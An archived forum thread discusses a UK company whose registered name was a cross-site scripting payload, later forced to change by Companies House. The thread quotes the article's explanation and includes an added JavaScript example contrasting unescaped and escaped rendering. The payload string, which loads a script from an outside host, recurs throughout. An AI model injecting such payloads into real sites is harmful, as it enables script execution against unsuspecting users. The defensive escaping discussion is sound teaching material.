Company named "><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD forced to change its name by the Companies House

Posted by WholesomeExcited2, 9 months ago (archived)

249 comments
97% Upvoted
level 1
· 9m

He now says he didn’t realise that Companies House was actually vulnerable to the extremely simple technique he used, known as “cross-site scripting”, which allows an attacker to run code from one website on another.

The original name of the company was ““><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD”. By beginning the name with a quotation mark and chevron, any site which failed to properly handle the HTML code would have mistakenly thought the company name was blank, and then loaded and executed a script from the site XSS Hunter, which helps developers find cross-site scripting errors.

That script would have simply put up a harmless alert – but it serves as proof that a malicious attacker could instead have used the same weakness as a gateway to more damaging ends.

585
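Added example, not code from the article or the thread: a constructed page template that interpolates the company name quoted above into an HTML attribute, showing why an unescaped name closes the attribute early (the name reads as blank and a script tag follows) and how context-aware HTML escaping neutralises it. The template, the renderer names and the escapeHtml helper are assumptions.

```javascript
// Added example (not from the article or the thread). The company name is the
// one quoted above; the rendering template and helper names are constructed.
const COMPANY_NAME = '"><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD';

// Escape the five characters that matter in HTML text and attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Naive renderer: drops the name straight into a quoted attribute and into
// element text. This is the handling mistake the article describes.
function renderUnsafe(name) {
  return `<input name="company" value="${name}"><span>${name}</span>`;
}

// Fixed renderer: every interpolation is escaped for its HTML context, so
// the leading quote and chevron stay inert text instead of closing the tag.
function renderSafe(name) {
  const safe = escapeHtml(name);
  return `<input name="company" value="${safe}"><span>${safe}</span>`;
}

// Check a test suite can run on rendered output: does a <script ...> tag
// appear anywhere the template did not itself write one?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// The value a parser would see for the first value="..." attribute
// (raw attribute text, entities not decoded).
function firstValueAttr(html) {
  const m = html.match(/value="([^"]*)"/);
  return m ? m[1] : null;
}

function demo() {
  const unsafe = renderUnsafe(COMPANY_NAME);
  const safe = renderSafe(COMPANY_NAME);
  return {
    unsafeValue: firstValueAttr(unsafe),          // '' : name looks blank
    unsafeHasScript: containsScriptTag(unsafe),   // true: tag escaped the attribute
    safeHasScript: containsScriptTag(safe),       // false: name stays plain text
    unsafe,
    safe,
  };
}
```

Run `demo()` and compare the two rendered strings: the unsafe one carries a live `<SCRIPT>` element after an empty `value=""`, exactly the blank-name-then-script behaviour the article describes, while the safe one contains only entity-encoded text.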
level 2
· 9m

We can call angle brackets chevrons? Open chevron, close chevron?

Less-than chevron, greater-than chevron?

274
level 1
· 9m

THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD

It's beautiful

1.0k
level 2
· 9m

Previous company names: [NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]

Dr Michael Tandy, you have my admiration and respect.

318
level 2
· 9m

"The company formerly known as "><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD"

20
level 1
· 9m

Bobby Tables's cousin?

690
level 2
· 9m

Bobby Tables' company, in fact.

397
level 2
· 9m

I like how the article attributes the xkcd comic with inspiring SQL injection, as if it wasn't already a known attack vector.

14
level 1
· 9m

Okay, but what is that thumbnail "code"?

edit: and why is that one var pink?

684
level 2
· 9m

My guess is a missing parenthesis threw off the syntax highlighter.

263
level 2
· 9m

Why so many firstname vars?

76
level 2
· 9m

lol, they're setting firstname over and over again; who wrote this?

65
level 2
· 9m

How many first names does this guy have?

EDIT: also I really want to know what the isComputer function does.

23
level 2
· 9m

Without being able to see the rest of the line, my guess is that they forgot a semicolon or something. You can see that document also isn't highlighted properly.

36
level 2
· 9m

They’re just making extra sure that ‘firstName’ is initialized

6
level 2
· 9m

My guess is that it's a stock photo that a non-coding designer created by cut-and-pasting some code.

5